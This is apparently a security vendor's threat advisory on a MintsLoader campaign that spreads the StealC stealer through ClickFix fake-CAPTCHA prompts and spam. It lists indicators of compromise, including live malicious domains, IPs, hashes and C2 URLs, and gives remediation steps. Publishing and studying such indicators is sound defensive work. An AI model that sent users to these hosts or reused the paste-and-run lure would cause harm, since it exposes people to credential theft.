Request a Demo
Rewterz
Multiple IBM Products Vulnerabilities
January 27, 2025
Rewterz
Multiple WordPress Plugins Vulnerabilities
January 27, 2025

MintsLoader Malware Campaign Targets Sectors with StealC and BOINC – Active IOCs

Severity

High

Analysis Summary

Threat hunters have uncovered an ongoing campaign leveraging MintsLoader, a PowerShell-based malware loader, to distribute secondary payloads such as the StealC information stealer and the legitimate open-source network computing platform BOINC. According to cybersecurity firm analysis, MintsLoader is delivered through spam emails containing links to KongTuke/ClickFix pages or an obfuscated JScript file.

The campaign, detected in January 2025, targets sectors such as electricity, oil and gas, and legal services in the U.S. and Europe. Attackers exploit fake CAPTCHA verification prompts on compromised websites to trick users into executing malicious PowerShell scripts. These prompts, known as ClickFix or KongTuke, inject scripts that load malicious code into a user’s clipboard and guide them to paste and execute it via the Windows Run prompt.

The attack chain begins with spam emails leading to the download of a JavaScript file that executes PowerShell commands to install MintsLoader. This PowerShell-based malware loader contacts a command-and-control (C2) server to download interim payloads, evade sandboxes using techniques like a Domain Generation Algorithm (DGA), and ultimately deploy StealC, an information stealer re-engineered from the Arkei stealer and sold as malware-as-a-service (MaaS). StealC avoids infecting systems in Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.

Simultaneously, the Astolfo Loader (JinxLoader V3), a rewritten version of JinxLoader in C++, highlights the affordability and proliferation of malicious tools on hacking forums. Researchers also identified GootLoader campaigns using search engine optimization (SEO) poisoning to redirect users to compromised WordPress sites hosting fake forums. These sites dynamically load malware via a "mothership" server, employing obfuscation, geofencing, and IP blocking to evade detection, making remediation challenging even for site owners.

Together, these campaigns underline the evolving sophistication of malware operations and the continued use of deceptive social engineering techniques to target victims across industries.

Impact

  • Sensitive Data Theft
  • Financial Loss

Indicators of Compromise

Domain Name

  • rosettahome.top
  • xaides.com
  • usbkits.com
  • hkinuxb3bz.top
  • mubuzb3vvv.top
  • nfuvueibzi4.top
  • mnudybh4unh.top
  • nuvye89bjz4.top
  • mbuz73hb7z3.top
  • tubnzy3uvz.top
  • nubxz4ubhxz9i.top
  • poeiughybzu222.top
  • poubnxu3jubz.top
  • lgbibzuehbz.top
  • ohunhebzhbu3.top
  • sdubvlbbuz3vzzz.top
  • bnbuzu49ibz4.top
  • shd9inbjz4.top
  • ngub8zb38ib.top
  • gkn33hxueub.top
  • mnvuz3gvy3.top
  • jhubzgv3.top
  • adkfnnbmakcgael.top
  • hhgiflifcbmdjmh.top
  • blclmjamegjaffd.top
  • iblaehgffmflamn.top
  • bfhdkgmmhdbikgj.top
  • jjdgdeffjimfgne.top
  • canjjclmlnicbga.top
  • jejmbadfmeenlnk.top
  • diebinjmajbkhhg.top
  • kmaealcfcalhcac.top
  • dckhgjimeghemhl.top
  • lggknhaffleahbh.top
  • ekbnfghmhcaldid.top
  • lalclenfjhkinbn.top
  • feheecfmkmhfiij.top
  • midhkalfmddcece.top
  • fnnkcnemajnnaja.top
  • mdinjlkfcajkjck.top
  • ghecbjcmdfghfkg.top
  • nlafhhiffkceadc.top
  • gbkiafbmhbmbkkl.top
  • afglgehgjgjmgdh.top
  • hjbamcnnkmfjbld.top
  • anldfaggmdbglen.top
  • idhglmmnaimdhlj.top
  • bidjdlegcnincee.top
  • immmjjkndeekmma.top
  • ccibchdgfjbhhfk.top
  • jgeeifjnhbledmg.top
  • ckahaebgighbngc.top
  • afnfdijahijefmh.top
  • kcehmenjdibnmni.top
  • kdemjgebjimkanl.top
  • gajaechkfhfghal.top
  • cmacnnkfbhlcncm.top

IP

  • 145.223.100.233
  • 67.217.228.118
  • 45.61.136.138

MD5

  • 46859e09844b9a698f15023607afa509

  • 902c133812718bacf8e86a6d8bbeb22d

  • 760f00e30887017cdea9809fd1c38e52

SHA-256

  • b8804a7ef09a9c1e8ede3a86a087b754b42f5b37c6de1e82c86f38d01c297ee2

  • 138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa

  • 91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3

SHA1

  • cdcc6faff70801edb2324d8472619d0b338f8080

  • 23ae2fdaf0c85b08e13ef68d925997c08a19a1f9

  • b09271e96ff73b86bd54489fbae1c224369a8bc8

URL

  • https://t1jm05fdu6748emu5oon8nix1uk2ogyn.lovesnextmeeting.com/Uswl5JAnXI
  • http://mubuzb3vvv.top/1.php?s=527
  • http://62.204.41.177/edd20096ecef326d.php

Remediation

  • Block all threat indicators at your respective controls.
  • Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
  • Do not download documents attached in emails from unknown sources and strictly refrain from enabling macros when the source isn’t reliable.
  • Ensure that all systems, software, and applications are up-to-date with the latest security patches. Regularly check for and apply updates to eliminate known vulnerabilities that attackers could exploit.
  • Educate employees about phishing emails, social engineering tactics, and safe online behavior. Effective training can reduce the likelihood of users inadvertently initiating an attack.
  • Regularly back up critical data and systems to offline or isolated storage. Test the backup restoration process to ensure that it is effective in case of an attack.
  • Deploy strong endpoint protection solutions that include advanced threat detection, behavior monitoring, and real-time protection against malware and ransomware.
  • Employ robust email filtering and anti-phishing solutions to detect and prevent malicious attachments and links from reaching user inboxes.
  • Conduct regular penetration testing and security assessments to identify vulnerabilities and weaknesses in your network and systems. Address any findings promptly.
  • Thoroughly assess third-party vendors and software before integrating them into your environment. Ensure they have strong security practices and adhere to cybersecurity standards.
  • Block the execution of HTA files and restrict macros in email attachments and downloaded files.